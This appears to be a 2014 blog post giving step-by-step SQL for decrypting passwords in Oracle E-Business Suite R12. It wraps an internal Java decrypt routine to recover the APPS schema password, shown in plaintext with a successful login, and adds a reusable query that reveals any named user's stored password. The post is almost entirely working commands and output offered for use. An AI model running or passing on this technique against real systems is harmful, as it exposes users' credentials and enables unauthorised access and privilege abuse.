Tuesday, November 18, 2014

Oracle Application R12: Crack APPS Password


1. Using system user we can decrypt it.


Login to system/<>

SQL> create FUNCTION apps.decrypt_pin_func(in_chr_key IN VARCHAR2,in_chr_encrypted_pin IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
  2    3    4    5
  6  /

Function created.

SQL> select ENCRYPTED_FOUNDATION_PASSWORD from apps.fnd_user where USER_NAME='GUEST';


ENCRYPTED_FOUNDATION_PASSWORD
--------------------------------------------------------------------------------
ZGD1A5C200E447B1412025F259B59C2780CF216B49C10ECCDDB93D564878096D7932D180CCC71671
63659569739CF63E958E

SQL> SELECT apps.decrypt_pin_func('GUEST/APPLMGR12','ZGD1A5C200E447B1412025F259B59C2780CF216B49C10ECCDDB93D564878096D7932D180CCC7167163659569739CF63E958E') from dual;

APPS.DECRYPT_PIN_FUNC('GUEST/APPLMGR12','ZGD1A5C200E447B1412025F259B59C2780CF216
--------------------------------------------------------------------------------
WINT3R

SQL> conn apps/WINT3R
Connected.

2.  Using package creation


SQL> show user
USER is "APPS"
SQL> CREATE OR REPLACE PACKAGE get_pwd AS
FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
RETURN VARCHAR2;
END get_pwd;
  2    3    4    5  /

Package created.

SQL>
CREATE OR REPLACE PACKAGE BODY get_pwd
 AS
FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
END get_pwd;
 /

Package body created.



    SELECT usr.user_name,
       get_pwd.decrypt
      ((SELECT (SELECT get_pwd.decrypt
      (fnd_web_sec.get_guest_username_pwd,
       usertable.encrypted_foundation_password
       )
       FROM DUAL) AS apps_password
       FROM fnd_user usertable
       WHERE usertable.user_name =
       (SELECT SUBSTR
       (fnd_web_sec.get_guest_username_pwd,
       1,
       INSTR
       (fnd_web_sec.get_guest_username_pwd,
       '/'
        )
       - 1
        )
       FROM DUAL)),
       usr.encrypted_user_password
          ) PASSWORD
  FROM fnd_user usr
  WHERE usr.user_name = upper('&USER_NAME');

Please feel free to give feedback.

No comments:

Post a Comment